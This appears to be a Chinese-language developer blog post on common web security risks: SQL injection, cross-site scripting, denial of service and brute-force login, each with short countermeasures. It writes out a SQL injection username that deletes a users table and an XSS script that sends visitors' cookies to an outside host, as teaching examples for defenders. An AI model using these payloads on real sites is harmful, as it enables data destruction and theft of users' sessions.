web安全考虑

最新推荐文章于 2022-12-09 22:30:35 发布
最新推荐文章于 2022-12-09 22:30:35 发布
阅读量108 收藏
点赞数
分类专栏: web 文章标签: Web SQL 浏览器 编程 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qiyueguxing/article/details/83641041
版权

在平时的编程中,我们常常会忽略一些重要的安全隐患,今天整理如下:

 

  1.SQL注入攻击
  服务器端程序有时希望接受客户端输入并且将他作为查询的一部分
  例如:一个接收用户名的登录界面可能执行以下代码:

 sql=select * from users where username=?

 
   如果客户端输入以下字符串作为用户名
 

 a';delete from users;

 

 sql=select * from users where username=a';delete from users;

 
   如果这条语句被执行,那么users表中的数据就会被删除
  
  对策:
    1.禁止输入特殊字符,如百分号,单引号,双引号
    2.禁止输入敏感字符,如update,insert,delete
    3.对特殊字符进行转义


  2、跨站脚本攻击
    假设有个留言板,你输入如下文字:
   

<script>
     document.location="http://myside.com/xx.jsp?cookies="+document.cookie
</script>

 
   这相当于在留言板网站的源程序中加入了JavaScript代码。
   当其他客户查看这条留言的时候,浏览器就会在后台把这个客户端浏览器的cookie发送到myside.com网站。
   这个网站只要设置接收程序就可以通过cookies变量获得该客户的cookies信息
   如果上述文字从数据库中取出来的,也会有同样的结果


   对策:
      1.在界面输入中,禁止输入脚本
      2.在把数据存入数据库之前,以及从数据库取出数据后,进行html转义
     

 

 3.拒绝攻击
    1.上传非常大的数据或文件可以很快地填满数据库
    2.短时间内上传大量数据或文件也可以填满数据库,使系统无法运转。
    攻击者可以在短时间内用大量的下载访问请求来堵塞服务器,使之没有空闲处理合法客户的请求。
  
 4.暴力攻击
      假设一个登录页面。攻击者可以编写代码,简单地加入一个循环来尝试用不同的用户名/密码登录,获得合法客户身份
  

qiyueguxing
关注
专栏目录
《网络安全自学教程》- Web体系架构存在的安全问题和解决方案
wangyuxiang946的博客
06-06 1万+
Web体系架构、Web三层架构、Web应用防火墙原理、网页防篡改系统的三种实现原理
java开发安全性问题_JAVA进行web开发安全问题
weixin_42512966的博客
02-16 690
一共有四种,分别是XSS攻击(关键是脚本,利用恶意脚本发起攻击),SQL注入(关键是通过用SQL语句伪造参数发出攻击),DDOS攻击(关键是发出大量请求,最后令服务器崩溃),CSRF攻击(关键是借助本地cookie进行认证,伪造发送请求)。1. XSS1.1 什么是XSS?XSS攻击:跨站脚本攻击(Cross-Site Scripting),为了不和层叠样式表(Cascading Style Sh...
web开发安全性的一些思考
sky_die的专栏
07-09 323
WEB开发的时候,很少对深层次的安全性进行考虑,国内现在的氛围也不是太好,读书的时候总是会逛乌云,后面工作一直也没怎么考虑,都是依靠框架去解决问题。但是由于安全部门对我们的网站检测比较多,虽然都是脚本检测的,但是依旧闹出了很多事情,需要处理 处理的办法,脚本扫描一般都是扫描框架漏洞,或者字符串,还有xml包处理的一些问题。处理起来并不复杂,通常是升级,加过滤,加判断。这些脚本都能通过。 ...
Web服务器的搭建和站点安全的实现
weixin_34415923的博客
01-18 159
环境:centos-6.4-x86_64软件:httpd-2.2.15-26.el6.centos.x86_6Web服务器的实现,在windows下有iis,在linux/unix有apache和nginx。我们这里先来讲解一下apache也就是httpd来实现web服务。再来介绍一下httpd和nginx的区别。httpd稳定性高,但是并发数少。而nginx的并发数多但是稳...
java 安全方面的考虑-简单
arkblue的专栏
04-02 1022
参考 深入理解JVM1 双亲委派模型(1)防止不可靠的代码用自己的版本替代可信任的类。(2)运行时包的概念:同一个类装载的、属于同一个包的、多个类型的集合。       加载java.lang.Virus这个非法的类,不能访问java.lang包中的API。2 class文件验证器   第一趟在类被装载的时候进行,检查内部结构,保证可被编译。   第二趟在连接过程中进行,语义检查,方法描述符符合特定字符串。   第三趟在连接过程中进行,字节码验证   第四趟在解析过程中进行,符号引用的验证3 内置的安全特性
java 安全考虑
weixin_34405557的博客
06-04 260
2019独角兽企业重金招聘Python工程师标准>>> ...
信息安全技术Web应用安全检测系统安全技术要求和测试评价方法.pdf
08-12
黑盒测试是指对Web应用程序的安全检测不考虑其内部结构和实现细节,而白盒测试是指对Web应用程序的安全检测需要考虑其内部结构和实现细节。灰盒测试是指对Web应用程序的安全检测既考虑其内部结构和实现细节,又考虑...
WEB安全审计
03-01
渗透程度有深浅,要看Web服务器的安全程度。浅则窃取一些用户账号相关信息,深则获得管理员账号。最常用的渗透手段是SQL注入、XSS(跨站)、上传漏洞。这里只从防御的角度阐述。1.泄露敏感信息—攻击者可以获取后台...
web安全前端编码规范1
08-04
一、项目设计阶段的安全考虑 在项目初始设计阶段,安全应被视为核心要素之一。这包括在需求分析和功能规划中考虑安全因素,确保从一开始就建立安全意识。对于重要的项目,应当邀请Web安全小组参与设计审查,提供...
Web安全:常见的安全问题及防范措施
shandongjiushen的博客
12-09 2216
警惕安全问题,防止信息裸奔!
web安全考虑的几方面
test_soy的博客
11-16 8071
随着存在安全隐患的Web应用程序数量的骤增,Open Web Application Security Project (开放式Web应用程序安全项目,缩写为OWASP)总结出了现有Web应用程序在安全方面常见的十大漏洞,以提醒企业及其程序开发人员尽量避免它们给企业IT系统带来的安全风险: 非法输入 Unvalidated Input 在数据被输入程序前忽略对数据合法性的检验是一个常见的编程
如何消除网站安全的七大风险
guojun828的专栏
05-19 569
文/ 晁晓娟 以工作中某项目的安全改善过程为例,分享了常用网站安全性的典型问题和解决对策,希望对网站开发者有借鉴意义。  有过网站开发经验的朋友都知道网站安全是构建网站时必须要考虑的一个因素,网站安全的重点在于服务器的安全配置管理以及程序脚本的完善性。值得注意的是,如果服务器的账号和权限由于管理不善而泄露了,即使技术上网站系统再安全,也不可避免会受到攻击。 在笔者曾经参与过
Java(web)项目安全漏洞及解决方式【面试+工作】
热门推荐
Java帮帮
05-13 2万+
Java(web)项目安全漏洞及解决方式【面试+工作】一.安全性问题层次关系大家经常会听到看到很多很多有关安全性方面的信息,可以说形形色色,对于在网络安全方面不太专业的同志来说,有点眼花缭乱,理不出头绪。在这里,我来帮大家整理一下。  以我个人多年来从事Web安全方面的工作经验及国外一些权威安全机构对Web安全的层次性的理解,我们通常把它分为三个层次:1.网络安全。如防火墙、路由器、网络结构等相关...
Java安全编程需要考虑的问题
尘世中迷途小码农的专栏
12-08 5050
这篇文章简要讨论了Java安全编程需要考虑的若干问题,通过对这些问题的深入理解,能够帮助我们在实际编码过程中避免出现安全相关的问题,从而提高代码质量。 由于时间关系,没有给出每个场景的示例代码,仅说明了该场景可能出现的安全问题以及对应的解决办法。 概述 一般而言,安全编程的目标有以下三点: 机密性 完整性 可用性 机密性要求数据不被他人轻易获取,需要进行数据加密。 完整性要求数据不被他人随意修改,需要进行指纹计算。 可用性要求服务不被他人恶意攻击,需要进行数据校验。 在Java中,安全.
java在web开发安全性方面的总结
技术狂人 Spring 的博客
12-07 2073
1.       客户输入的原始数据进行校验不依赖于Script。虽然JavaScript等等的客户端的输入数据的校验即使比较方便也不能使用因为安全性方面的原因。脚本是不安全的,用户可能屏蔽脚本,我们可以将用户数据送入服务器端,在服务器上验证字符串的合法性。 2.       HTML的输入标识符中去除所有输入的尖括号'', 3.       HTML埋进数据的时候有一定HTML编码('' '
提升Java代码性能和安全
北京Java青年
06-13 8204
安全嘛,少用反射,尽量用私有成员达到封装性,代码尽量不要出现异常,出现异常要及时处理,面向接口编程做到代码通用性。 性能嘛。。在达到封装目的后尽量少用对象和类,多用基本数据类型,避免重复调用同一方法或属性,尽量用基本数据类型代替,尤其是在大循环中更要注意。 避免大量阻塞出现,,,,我想其实应该还有很多其他方面吧。平时注意养成习惯就好 实际只能二者平衡 反射可以把类的常量随便改,破坏封装安...
javaweb项目进销存管理系统springboot+vue+redis idea导入 mysql数据库-java课程设计毕业设
最新发布
10-18
该系统采用Spring Boot作为后端框架,Vue.js作为前端技术,集成Redis进行缓存管理,并使用MySQL数据库进行数据存储。此项目旨在为在校大学生的Java课程设计和毕业设计提供全面的学习参考与实践指导,同时为Java技术爱好者提供丰富的学习资料。帮助用户深入理解进销存管理系统的设计思路与实现方法。通过该源码,开发者可以掌握Spring Boot、Vue.js、Redis和MySQL的结合使用,提升全栈开发能力,是学习Java开发的重要实践材料,适合于进行个人项目或课程作业参考。
WEB安全编程技术规范详解
WEB安全编程中,规范的制定至关重要,因为它有助于确保软件在开发阶段就考虑安全因素。这份规范首先定义了其范围,涵盖了从基础的安全编码原则到特定语言的安全编程技巧。规范的目标是使开发人员能够识别并避免...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值